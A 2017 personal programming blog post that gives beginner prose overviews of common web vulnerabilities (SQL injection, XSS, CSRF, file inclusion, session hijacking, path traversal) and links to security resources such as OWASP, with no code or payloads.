Home    posts    security aspect programming

Posted on: September 21, 2017Updated: December 1, 2017

Sneak peak on security aspect of programming

I feel that at some point I would have to say a few words on the topic so why not right at the start. In my opinion, security of the code should always be equally evaluated as functionallity because what good is the code that's working, if you have to rewrite it when it's compromised. Not to mention the potential damage that can be the result of neglecting the security aspect. However, I believe that most vulnerabilities pop up, not due to lack of focus or carelessness but, because of not knowing about the dangers and traps when coding. Not saying I know it all because I don't and I can't even guarrantee you that all my code posted on this website will be 100% secure but I will keep an eye and do what I can to deliver safe code. Anyway, I wanted to point out the vulnerabilities that are most known and exploited and apply to multiple languages. There are also guidelines on the way to write more secure code in general, especially in PHP since it's a very broad language, even cosidered both a framework and a language. Links to information will be provided.

SQL injection

The purpose of this attack is directed against a server's database, to gain private information or unauthorized access to the database. It can be used to inject rows or create tables, or modify existent rows or tables, copy them to local disk or even delete them. It is a very dangerous attack, especially when talking about large databases of large companies that store very private information about their users, such as medical data for example. The attack can be exploited via website's input forms and urls. Along with XSS, one of the most common attacks on global scale.

XSS and CSRF

XSS(cross-site scripting) is directed towards the end users of the website or web application to unvoluntarily execute client-based code, usually Java-script, to redirect them to a malicious site or gather private information about the user. The arbitrary code can be injected through HTML or JAVASCRIPT input forms that are then saved to the values, attributes, element contents, urls and even HTML CSS tags. The CSRF(cross-site request forgery) is an advanced attack of XSS where an attacker tricks the user into making uninteded request, for example, to change the password of particular service unwilingly. Usually if a website or web app is vulnerable to XSS, it is also vulnerable to CSRF.

RFI and LFI

RFI(remote file inclusion) is an attack that targets vulnerabilities in web apps that dynamically reference external scripts with the goal to exploit the application's function to upload malicious file from a remote location, most likely from a completely different URL with different domain. Similarily, LFI(local file inclusion) involves unauthorized file inclusion in the targeted file system through the upload application function in browser locally as HTTP request. FTP server vulnerabilites can also be used for flie inclusion.

There are more more potential dangers lurking around, such as Session hijacking and Path traversal so I'm just going to provide the links that I find useful.

1. OWASP

Probably the most important site out there when searching for knowledge. With vast amount of information and pseudo-code examples you can learn of any known attack ever performed. Reading it all at once would be pointless, just like wikipedia, so only look for what you need at the moment. If you don't know what to look for, here and here are a good starting points.

2. PHP security

A good manual on PHP coding that can be read in full but can easily be revisited in moments of unclarity. I recommend it to anyone ever dealing with PHP.

3. Session fixation and hijacking

It's a nasty attack that cannot be 100% prevented, at least not in 5% of the remaining cases. The best solution is to use TLS/SSL encryption between a server and a client and prevent stealing the session id cookie. From the server side you could compare IP address and user agent used when session was created(upon authentication) and a client's IP address and user agent that is currently using the session. In most cases, that's fine but people on LAN are still vulnerable while people behind a proxy might have a lot of issues using the session. References here and here.

4. Path traversal

Used to gain private information or use the vulnerability for RFI in order to gain unauthorized access to the system. The examples, used in references here and here, are specific and may not apply to your case. It is just an example how the code can be insecure.

5. Handling file permissions

A good deal of information on how to handle file permissions for different types of visitors on a linux server for different protocols. Here is an even more broad discussion on the topic.

6. Exploitable functions

When it comes to built in functions some can be exploited when certain conditions are met. For PHP, here is probably the best list and arguments I've seen. Similarily a list of exploitable Python functions can be found here.


Comments:

Be the first to comment.

Add a comment:










I have read and agree with the Privacy terms and conditions.